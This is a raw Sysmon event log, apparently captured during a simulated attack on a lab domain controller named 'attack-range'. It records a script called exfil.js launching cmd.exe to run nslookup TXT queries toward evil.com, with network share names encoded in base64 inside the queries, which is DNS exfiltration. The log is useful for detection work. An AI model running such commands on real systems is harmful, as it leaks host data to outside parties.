14:16:43.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203714Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.508{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203713Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.493{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C941-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203712Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.493{2E1864BB-17CB-629A-C741-000000005F02}3767312C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-C941-000000005F02}5928C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203711Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.507{2E1864BB-17CB-629A-C941-000000005F02}5928C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-C741-000000005F02}376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrolfpt.tmp 2>&1 10341000x8000000000000000203710Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.477{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-C841-000000005F02}7576C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203709Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.477{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-C841-000000005F02}7576C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203708Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.477{2E1864BB-17CB-629A-C841-000000005F02}75764864C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-C741-000000005F02}376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203707Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.462{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C841-000000005F02}7576C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203706Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.461{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203705Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.461{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203704Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.460{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203703Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.460{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203702Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.458{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C741-000000005F02}376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203701Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.458{2E1864BB-17A1-629A-783D-000000005F02}55521152C:\Windows\System32\WScript.exe{2E1864BB-17CB-629A-C741-000000005F02}376C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203700Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.457{2E1864BB-17CB-629A-C741-000000005F02}376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVOYW1lOiBORVRMT0dPTg== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrolfpt.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000203699Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.439{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlunnx.tmpMD5=72212EBDCB2E8E793A1B2134D4FA7DE3,SHA256=B332410D88A2D1B397F1BE63E741050D785B52E6644B4C66DB2FEDBE9A959973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000203698Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.408{2E1864BB-17CB-629A-C541-000000005F02}57207288C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-C641-000000005F02}1696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203697Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.408{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203696Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.408{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203695Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.408{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203694Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.408{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203693Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.408{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C641-000000005F02}1696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203692Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.408{2E1864BB-17CB-629A-C441-000000005F02}38724284C:\Windows\system32\cmd.exe{2E1864BB-17CB-629A-C641-000000005F02}1696C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000203691Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.414{2E1864BB-17CB-629A-C641-000000005F02}1696C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17CB-629A-C441-000000005F02}3872C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgSVBD evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlunnx.tmp 2>&1 10341000x8000000000000000203690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.392{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-C541-000000005F02}5720C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.392{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17CB-629A-C541-000000005F02}5720C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.377{2E1864BB-17CB-629A-C541-000000005F02}57207288C:\Windows\system32\conhost.exe{2E1864BB-17CB-629A-C441-000000005F02}3872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.377{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17CB-629A-C541-000000005F02}5720C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000203686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.361{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203685Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.361{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000203684Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:43.361{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 